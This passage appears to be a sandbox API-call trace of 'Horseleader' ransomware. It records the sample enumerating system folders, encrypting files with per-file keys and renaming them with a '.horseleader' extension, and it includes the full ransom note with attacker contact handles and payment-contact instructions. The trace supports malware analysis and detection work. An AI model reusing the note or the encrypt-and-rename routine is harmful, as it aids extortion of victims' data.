lstrlenW (lpString=".testttjffg") returned 11 [0228.467] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL", lpSrch=".testttjffg") returned 0x0 [0228.467] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.467] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.467] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.468] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 68 [0228.468] StrStrW (lpFirst="ITIRCL55.DLL", lpSrch=".txt") returned 0x0 [0228.468] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1831424) returned 1 [0228.468] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.468] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.471] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.471] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.471] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xdd100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.471] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.474] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.474] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.474] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0x1ba200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.474] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.477] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.477] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.477] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.477] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.478] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.478] CloseHandle (hObject=0x158) returned 1 [0228.478] GetProcessHeap () returned 0x780000 [0228.478] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.478] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.horseleader") returned 80 [0228.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.horseleader")) returned 1 [0228.479] GetProcessHeap () returned 0x780000 [0228.479] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.479] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x616b36d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x69000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msitss55.dll", cAlternateFileName="")) returned 1 [0228.479] lstrcmpiW (lpString1="msitss55.dll", lpString2="Windows") returned -1 [0228.479] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 68 [0228.480] StrStrIW (lpFirst="msitss55.dll", lpSrch=".horseleader") returned 0x0 [0228.480] lstrcmpW (lpString1="msitss55.dll", lpString2="#Decrypt#.txt") returned 1 [0228.480] lstrcmpW (lpString1="msitss55.dll", lpString2="_uninstalling_.png") returned 1 [0228.480] lstrlenW (lpString=".testttjffg") returned 11 [0228.480] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll", lpSrch=".testttjffg") returned 0x0 [0228.480] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.480] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.480] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.503] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 68 [0228.503] StrStrW (lpFirst="msitss55.dll", lpSrch=".txt") returned 0x0 [0228.503] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=430080) returned 1 [0228.503] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.503] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.509] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.509] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.510] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x32000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.510] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.537] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.537] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, 
nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.538] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x64000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.538] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.855] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.856] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.896] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.897] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.897] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.897] CloseHandle (hObject=0x158) returned 1 [0228.898] GetProcessHeap () returned 0x780000 [0228.898] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.898] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.horseleader") returned 80 [0228.898] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll.horseleader")) returned 1 [0228.915] GetProcessHeap () returned 0x780000 [0228.915] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.915] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x616b36d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x69000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msitss55.dll", cAlternateFileName="")) returned 0 [0228.915] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0228.915] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\#Decrypt#.txt") returned 69 [0228.915] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0228.916] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ 
\r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0228.916] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0228.920] lstrlenA (lpString="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") returned 1368 [0228.920] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0228.920] CloseHandle (hObject=0x21c) returned 1 [0228.920] GetProcessHeap () returned 0x780000 [0228.920] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0228.920] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ink", cAlternateFileName="")) returned 1 [0228.920] lstrcmpiW (lpString1="ink", lpString2="Windows") returned -1 [0228.921] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 54 [0228.921] lstrcmpW (lpString1="ink", lpString2=".") returned 1 [0228.922] lstrcmpW (lpString1="ink", lpString2="..") returned 1 [0228.922] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0228.922] GetProcessHeap () returned 0x780000 [0228.922] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 
0x7d9fd8 [0228.922] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*") returned 56 [0228.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0229.009] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.009] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\.") returned 56 [0229.032] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.032] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0229.032] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.032] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\..") returned 57 [0229.032] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.032] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0229.033] FindNextFileW (in: 
hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bbccc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c2bbccc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc1486, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Alphabet.xml", cAlternateFileName="")) returned 1 [0229.033] lstrcmpiW (lpString1="Alphabet.xml", lpString2="Windows") returned -1 [0229.033] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 67 [0229.033] StrStrIW (lpFirst="Alphabet.xml", lpSrch=".horseleader") returned 0x0 [0229.033] lstrcmpW (lpString1="Alphabet.xml", lpString2="#Decrypt#.txt") returned 1 [0229.033] lstrcmpW (lpString1="Alphabet.xml", lpString2="_uninstalling_.png") returned 1 [0229.033] lstrlenW (lpString=".testttjffg") returned 11 [0229.033] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpSrch=".testttjffg") returned 0x0 [0229.033] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0229.033] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0229.033] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.067] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0229.067] lstrcmpiW (lpString1="ar-SA", lpString2="Windows") returned -1 [0229.067] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA") returned 60 [0229.067] lstrcmpW (lpString1="ar-SA", lpString2=".") returned 1 [0229.067] lstrcmpW (lpString1="ar-SA", lpString2="..") returned 1 [0229.067] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0229.067] GetProcessHeap () returned 0x780000 [0229.067] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0229.067] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*") returned 62 [0229.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0229.077] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.077] wnsprintfW (in: 
pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\.") returned 62 [0229.078] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.079] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0229.079] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.079] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\..") returned 63 [0229.090] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.090] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0229.090] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe846a08f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe86330eb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe8659248, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0229.090] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0229.090] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 76 [0229.090] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 
[0229.090] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0229.090] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0229.092] lstrlenW (lpString=".testttjffg") returned 11 [0229.092] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0229.092] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.092] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.092] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.110] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe846a08f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe86330eb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe8659248, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0229.112] FindClose (in: hFindFile=0x7c6760 | out: 